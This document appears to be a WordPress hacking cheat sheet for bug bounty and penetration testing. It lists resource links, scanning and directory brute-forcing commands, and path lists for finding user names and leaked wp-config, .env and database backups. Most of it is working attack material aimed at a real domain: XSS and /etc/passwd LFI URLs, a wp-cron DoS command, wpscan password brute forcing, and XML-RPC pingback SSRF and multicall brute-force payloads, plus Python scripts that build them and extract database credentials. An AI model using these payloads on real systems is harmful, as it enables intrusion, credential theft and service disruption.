Resources
- By Medium :
  https://infosecwriteups.com/mastering-wordpress-bug-hunting-a-complete-guide-for-security-researchers-3ff7ee4413a2
  https://infosecwriteups.com/pwning-wordpress-passwords-2caf12216956
  https://systemweakness.com/how-to-get-a-reverse-shell-from-any-wordpress-d12e2f7a3033
  https://thegrayarea.tech/p1-bug-hunting-exploiting-common-wordpress-vulnerabilities-28046f85c588
  https://hossamshady.medium.com/advanced-level-for-wordpress-vulnerabilities-e93144e3a8f3
  https://systemweakness.com/hacking-wordpress-server-database-f6cc6c116057
  https://medium.com/@olger346/hacking-wordpress-with-some-common-vulnerabilities-256bd2c251f6
  https://medium.com/@nguhuynh/how-did-i-get-200-with-wordpress-vulnerability-4ce80f106709
  https://riteshgohil-25.medium.com/ato-of-wordpress-website-4-digits-bounty-in-5-minute-cc888c4054c9
  https://medium.com/hengky-sanjaya-blog/scan-wordpress-vulnerability-with-wpscan-b2de6c3de65c
  https://infosecwriteups.com/how-to-hack-a-wordpress-website-with-wpscan-85481309dd73
- By habr : https://habr.com/ru/articles/728294/
- By hackingarticles :
  https://www.hackingarticles.in/penetration-testing-lab-setup-wordpress/
  https://www.hackingarticles.in/wpscanwordpress-pentesting-framework/
  https://www.hackingarticles.in/wordpress-reverse-shell/
- By RedNexus : https://www.youtube.com/watch?v=gd9-nqFRT2Q
- By 0xma : https://0xma.github.io/hacking/wordpress_theme_edit.html
- By smaranchand : https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/
- By hackertarget : https://hackertarget.com/attacking-wordpress/
- By invicti : https://www.invicti.com/blog/web-security/xml-rpc-protocol-ip-disclosure-attacks/
- By HackerOne : https://hackerone.com/reports/124097
Cheat sheets
- Hacking Wordpress : https://github.com/cyberteach360/Hacking-Wordpress
- By haax.fr : https://cheatsheet.haax.fr/web-pentest/content-management-system-cms/wordpress/
- hacktricks : https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/wordpress.html
- By exploit-notes : https://exploit-notes.hdks.org/exploit/web/cms/wordpress-pentesting/
Commands
- Enumeration
- Scanning
- General
# Generic and WordPress-tagged nuclei runs, plus a single local template
nuclei -u https://facebook.com/
nuclei -u https://facebook.com -t ./wp-login-register-detect.yaml
nuclei -u https://facebook.com -tags wordpress
# WPScan: random UA, enumerate vulnerable plugins/themes, timthumbs, config backups, DB exports, users
# (the API token from wpscan.com is needed for vulnerability data; --rua is --random-user-agent)
wpscan --rua -e vp,vt,tt,cb,dbe,u --url https://www.facebook.com/ --api-token <WPSCAN_API_TOKEN>
# CMSmap full scan, skipping TLS certificate validation
python3 cmsmap.py -s https://www.facebook.com/ -F
# Historic URLs from the Wayback Machine
echo "facebook.com" | waybackurls
- Files
- General
# Content discovery on one host: many extensions, link extraction (-E), backup collection (-B), word collection (-g)
feroxbuster -u https://facebook.com -x php,cgi,htm,html,shtm,shtml,js,txt,bak,zip,old,conf,log,pl,asp,aspx,jsp,sql,db,sqlite,mdb,tar,gz,7z,rar,json,xml,yml,yaml,ini,java,py,rb,php3,php4,php5 --random-agent --depth 3 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -t 100 -C 404 --redirects --rate-limit 10 -E -B -g -o fero.json --json
# Subdomains from a list, using the SecLists WordPress wordlist
cat sub.txt | feroxbuster --stdin -w /usr/share/wordlists/seclists/Discovery/Web-Content/CMS/wordpress.fuzz.txt -x php --smart --random-agent --json -o Fero.json
- Usernames
# Default REST API endpoint
/wp-json/wp/v2/users
# Alternative routes (when /wp-json/ is blocked or rewritten; n = a user ID)
/wp-json/wp/v2/users/n
/wp-json/?rest_route=/wp/v2/users/
/wp-json/?rest_route=/wp/v2/users/n
/index.php?rest_route=/wp/v2/users
/index.php?rest_route=/wp/v2/users/n
# With query parameters
/wp-json/wp/v2/users?page=1
/wp-json/wp/v2/users/?per_page=100
/wp-json/wp/v2/users/?orderby=id&order=asc
/wp-json/wp/v2/users?search=admin
/wp-json/wp/v2/users?search=editor
# Direct user ID probing
/wp-json/wp/v2/users/1
/wp-json/wp/v2/users/2
/wp-json/wp/v2/users/9999
# Legacy or alternative endpoints
/wp-json/users
/wp-json/wp/v2/users.json
/?rest_route=/wp/v2/users
/?rest_route=/wp/v2/users/1
- Configurations & Dirs
# Main WordPress configuration file and common backup copies
# (a live /wp-config.php is executed by PHP and returns a blank page; only copies with a non-PHP extension leak source)
/wp-config.php
/wp-config.php.bak
/wp-config.php.save
/wp-config.php.old
/wp-config.php.orig
/wp-config.php~
/wp-config.php.txt
/wp-config.php.zip
/wp-config.php.tar.gz
/wp-config.php.backup
# Environment files
/.env
/.env.bak
/.env.old
/.env.save
/.env.example
/.env.local
# Backup & archive leaks
/backup.zip
/backup.tar.gz
/db.sql
/database.sql
/dump.sql
/wordpress.zip
/wordpress.tar.gz
/website-backup.zip
/site-backup.tar.gz
# Other sensitive config files and default WordPress entry points
/wp-config-sample.php
/.htaccess
/.htpasswd
/phpinfo.php
/config.json
/config.php
/config.php.bak
/robots.txt
/xmlrpc.php
/wp-cron.php
/wp-login.php
/wp-admin.php
/license.txt
/wp-activate.php
/wp-admin/login.php
/wp-admin/wp-login.php
/login.php
/wp-sitemap.xml
/test.php
- Registration Page
# Nuclei template: detects an unfinished install whose setup-config.php is still reachable
id: setup-wp

info:
  name: wp setup
  author: ELSFA7110
  severity: critical
  reference: https://twitter.com/sec715/status/1397924997457317897
  tags: rce,exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}//wp-admin/setup-config.php?step=1"
    # matcher added so the template only fires on the real setup form (step 1 posts to step=2)
    matchers:
      - type: word
        part: body
        words:
          - "setup-config.php?step=2"

# run a local template file against a target
nuclei -u https://facebook.com -t ./wp-login-register-detect.yaml
- WordPress Setup
wget "https://facebook.com/wp-admin/setup-config.php?step=1"
# Nuclei template: https://github.com/coffinxp/nuclei-templates/blob/main/wp-setup-config.yaml
- Admin-AJAX
# XSS examples (theme AJAX action and a timthumb-style script reflecting src)
https://domain.com/wp-admin/admin-ajax.php?action=tie_get_user_weather&options={'location'%3A'Cairo'%2C'units'%3A'C'%2C'forecast_days'%3A'5<%2Fscript><script>alert(document.domain)<%2Fscript>custom_name'%3A'Cairo'%2C'animated'%3A'true'}
https://domain.com/wp-content/themes/ambience/thumb.php?src=<body onload=prompt(1)>.png
# LFI example (the pl parameter is included as a file path, so this reads /etc/passwd rather than executing code)
https://domain.com/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
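The probes in the Usernames and Configurations & Dirs lists above produce responses that are easy to misread: the REST users endpoint may answer with a list, a single object, or a `rest_user_cannot_view` error object, and a 200 for `/wp-config.php` usually means PHP executed the file and returned nothing, not that it leaked. The following is an added example (not part of the original notes, not wpscan or feroxbuster code) that triages those responses offline; the sample JSON and wp-config text are constructed, and `target.example` is a placeholder host.

```python
"""Triage helpers for the REST user enumeration and wp-config backup probes.
Added example, standard library only; sample responses are constructed."""
import json
import re
from typing import Dict, List

# define( 'DB_NAME', 'value' ) lines in a leaked wp-config copy
_DEFINE_RE = re.compile(
    r"""define\(\s*['"](DB_NAME|DB_USER|DB_PASSWORD|DB_HOST)['"]\s*,\s*['"]([^'"]*)['"]\s*\)"""
)
_PREFIX_RE = re.compile(r"""\$table_prefix\s*=\s*['"]([^'"]+)['"]""")


def parse_rest_users(body: str) -> List[Dict[str, str]]:
    """Parse /wp-json/wp/v2/users output into [{id, slug, name}].

    Handles the list form (/users), the single-object form (/users/1) and the
    WP_Error object returned when listing is restricted
    ({"code": "rest_user_cannot_view", ...}), which yields []."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return []                       # HTML soft-404, WAF page, etc.
    if isinstance(data, dict):
        if "code" in data and "id" not in data:
            return []                   # WP_Error object
        data = [data]
    users = []
    for u in data:
        if isinstance(u, dict) and "id" in u and "slug" in u:
            # slug is user_nicename, which normally equals the login name
            users.append({"id": str(u["id"]), "slug": u["slug"], "name": u.get("name", "")})
    return users


def classify_wp_config(status: int, body: str) -> str:
    """Decide whether a wp-config probe actually leaked source.

    A live /wp-config.php is executed by PHP and comes back as an empty 200;
    only a copy served as text (.bak, .old, .txt, ...) contains the defines."""
    if status == 404:
        return "not-found"
    if status == 200 and not body.strip():
        return "executed-blank"
    if _DEFINE_RE.search(body):
        return "leak"
    return "other"                      # soft-404 page, block page, unrelated file


def extract_db_creds(body: str) -> Dict[str, str]:
    """Pull DB_* constants and the table prefix out of leaked wp-config source."""
    creds = {name: value for name, value in _DEFINE_RE.findall(body)}
    m = _PREFIX_RE.search(body)
    if m:
        creds["table_prefix"] = m.group(1)
    return creds


# --- constructed sample responses (not captured from any real site) ---
SAMPLE_USERS = json.dumps([
    {"id": 1, "name": "Site Admin", "slug": "admin", "link": "https://target.example/author/admin/"},
    {"id": 7, "name": "Jane Editor", "slug": "jane", "link": "https://target.example/author/jane/"},
])
SAMPLE_DENIED = json.dumps({"code": "rest_user_cannot_view",
                            "message": "Sorry, you are not allowed to list users.",
                            "data": {"status": 401}})
SAMPLE_WP_CONFIG_BAK = """<?php
define( 'DB_NAME', 'wp_prod' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'S3cret!Pass' );
define( 'DB_HOST', 'localhost' );
$table_prefix = 'wp_';
"""

if __name__ == "__main__":
    for u in parse_rest_users(SAMPLE_USERS):
        print(f"user {u['id']}: login candidate {u['slug']!r} ({u['name']})")
    print(parse_rest_users(SAMPLE_DENIED))
    print(classify_wp_config(200, ""), classify_wp_config(200, SAMPLE_WP_CONFIG_BAK))
    print(extract_db_creds(SAMPLE_WP_CONFIG_BAK))
```

Feed the functions the status code and body from whatever client you use for the path lists above; the slugs returned by `parse_rest_users` are the usernames to carry into the brute-force section, and only a `leak` classification is worth reporting.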
- Exploitation
- Dos
# every hit on wp-cron.php makes WordPress start a scheduled-task run, which is what makes it expensive
doser -t 10000 -p 'https://www.facebook.com/wp-cron.php'
- Bruteforce (Login)
# Default credentials lookup (defaultcreds-cheat-sheet)
pip3 install defaultcreds-cheat-sheet
creds search phpmyadmin
# WPScan brute force (single username; the option is --usernames even for one name)
wpscan --url https://target.com --usernames admin --passwords /path/to/passwords.txt --disable-tls-checks
# WPScan brute force (multiple usernames)
wpscan --url https://target.com --usernames /path/to/usernames.txt --passwords /path/to/passwords.txt --disable-tls-checks
# WPScan brute force forced over XML-RPC instead of wp-login.php
wpscan --url https://target.com --usernames admin --passwords /path/to/passwords.txt --disable-tls-checks --max-threads 10 --password-attack xmlrpc
- XMLRPC
- List Methods
<methodCall>
  <methodName>system.listMethods</methodName>
  <params></params>
</methodCall>
- Pingback
- IP disclosure & DoS attack
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param>
      <value><string>https://webhook.site/777e9d9c-c786-472e-a042-af72e1111084</string></value>
    </param>
    <param>
      <value><string>https://www.facebook.com/en/news-post/unveiling-the-depths-african-coastal/</string></value>
    </param>
  </params>
</methodCall>
- XSPA (Cross Site Port Attack)
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param>
      <value><string>https://<website>:<port>/</string></value>
    </param>
    <param>
      <value><string>https://<SOME VALID BLOG POST FROM THE SITE>/</string></value>
    </param>
  </params>
</methodCall>
- wp.getUsersBlogs
- Login Bruteforce
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
  <methodName>wp.getUsersBlogs</methodName>
  <params>
    <param><value>username</value></param>
    <param><value>password</value></param>
  </params>
</methodCall>
- Multicall (to speed up)
# Since WordPress 4.4 the first failed login in a request makes every later login in the same multicall fail unchecked, so this only speeds things up against older installs.
<?xml version="1.0"?>
<methodCall>
  <methodName>system.multicall</methodName>
  <params><param><value><array><data>
    <!-- one struct per username/password pair to test; add as many as needed -->
    <value><struct>
      <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
      <member><name>params</name><value><array><data>
        <value><array><data>
          <value><string>{{ Username }}</string></value>
          <value><string>{{ Password }}</string></value>
        </data></array></value>
      </data></array></value></member>
    </struct></value>
    <value><struct>
      <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
      <member><name>params</name><value><array><data>
        <value><array><data>
          <value><string>{{ Username }}</string></value>
          <value><string>{{ Password }}</string></value>
        </data></array></value>
      </data></array></value></member>
    </struct></value>
  </data></array></value></param></params>
</methodCall>
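Hand-editing the XML above for every credential pair does not scale, and the response is just as fiddly: each multicall result is either a fault struct (403, "Incorrect username or password.") or a one-element array holding the blog list, and pingback.ping reports its outcome as a fault code. The following is an added example (not from the original notes, not WordPress or wpscan code) that builds both payloads with Python's standard `xmlrpc.client` and maps the answers back to what was asked. The sample responses are constructed, not captured; `target.example` and `attacker.example` are placeholders, and the multicall sample is shaped the way an install older than 4.4 would answer, since newer ones stop checking after the first failure.

```python
"""XML-RPC payload builder and response parser for the system.multicall
brute force and pingback probes. Added example, standard library only;
the sample responses are constructed."""
import xmlrpc.client
from typing import List, Sequence, Tuple

Cred = Tuple[str, str]


def build_multicall(creds: Sequence[Cred]) -> str:
    """One system.multicall body that tries every (username, password) pair
    through wp.getUsersBlogs; same structure as the hand-written XML above."""
    calls = [{"methodName": "wp.getUsersBlogs", "params": [u, p]} for u, p in creds]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def parse_multicall_response(body: str, creds: Sequence[Cred]) -> List[Tuple[str, str, bool]]:
    """Map each multicall result back to its credential pair.

    A failed login decodes to a dict (fault struct, faultCode 403); a success
    decodes to a list (the array wrapping the blog list). Caveat: since
    WordPress 4.4 the first failed login in a request makes every later login
    in the same multicall fail without being checked, so on a current install
    only the pairs up to and including the first failure were really tested."""
    (results,), _ = xmlrpc.client.loads(body)
    return [(user, pwd, isinstance(res, list)) for (user, pwd), res in zip(creds, results)]


def build_pingback(source: str, target: str) -> str:
    """pingback.ping body: WordPress fetches `source` (the SSRF/XSPA vector)
    and looks in it for a link to `target`, which must be a real post."""
    return xmlrpc.client.dumps((source, target), methodname="pingback.ping")


def pingback_fault(body: str) -> Tuple[int, str]:
    """Return (faultCode, faultString) from a pingback.ping response, or
    (0, '') on success. WordPress answers 16 when it could not fetch the
    source URL and 17 when it fetched it but found no link to the target;
    that difference is what XSPA uses to tell a closed port from an open one."""
    try:
        xmlrpc.client.loads(body)
    except xmlrpc.client.Fault as f:
        return f.faultCode, f.faultString
    return 0, ""


# --- constructed sample responses ---
SAMPLE_CREDS = [("admin", "admin123"), ("admin", "Winter2024!")]
SAMPLE_MULTICALL_RESP = """<?xml version="1.0"?>
<methodResponse><params><param><value><array><data>
 <value><struct>
  <member><name>faultCode</name><value><int>403</int></value></member>
  <member><name>faultString</name><value><string>Incorrect username or password.</string></value></member>
 </struct></value>
 <value><array><data><value><array><data><value><struct>
  <member><name>isAdmin</name><value><boolean>1</boolean></value></member>
  <member><name>blogid</name><value><string>1</string></value></member>
  <member><name>blogName</name><value><string>Target</string></value></member>
  <member><name>url</name><value><string>https://target.example/</string></value></member>
  <member><name>xmlrpc</name><value><string>https://target.example/xmlrpc.php</string></value></member>
 </struct></value></data></array></value></data></array></value>
</data></array></value></param></params></methodResponse>"""
SAMPLE_PINGBACK_CLOSED = """<?xml version="1.0"?>
<methodResponse><fault><value><struct>
 <member><name>faultCode</name><value><int>16</int></value></member>
 <member><name>faultString</name><value><string>The source URL does not exist.</string></value></member>
</struct></value></fault></methodResponse>"""

if __name__ == "__main__":
    print(build_multicall(SAMPLE_CREDS))
    print(parse_multicall_response(SAMPLE_MULTICALL_RESP, SAMPLE_CREDS))
    print(build_pingback("https://attacker.example/", "https://target.example/?p=1"))
    print(pingback_fault(SAMPLE_PINGBACK_CLOSED))
```

POST the returned strings to `/xmlrpc.php` with `Content-Type: text/xml` and hand the body back to the parser. For XSPA, remember that `wp_safe_remote_get` refuses loopback and private address ranges on modern WordPress, so internal hosts come back as fault 16 regardless of port; the technique is reliable only for externally reachable targets.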
Tools
- CMSmap :https://github.com/Dionach/CMSmap
- wpscan : https://github.com/wpscanteam/wpscan
- nikto : https://github.com/sullo/nikto
- nuclei : https://github.com/projectdiscovery/nuclei
- waybackurls : https://github.com/tomnomnom/waybackurls
- doser : https://github.com/Quitten/doser.go
- Fast-Google-Dorks-Scan : https://github.com/IvanGlinkin/Fast-Google-Dorks-Scan
- fuzzuli : https://github.com/musana/fuzzuli
- dvwp : https://github.com/vavkamil/dvwp
Wordlist
- Wordpress-BruteForce-List : https://github.com/kongsec/Wordpress-BruteForce-List
- Bug-Bounty-Wordlists : https://github.com/Karanxa/Bug-Bounty-Wordlists/tree/main
- coffin_wp-fuzz : https://github.com/coffinxp/payloads/blob/main/coffin%40wp-fuzz.txt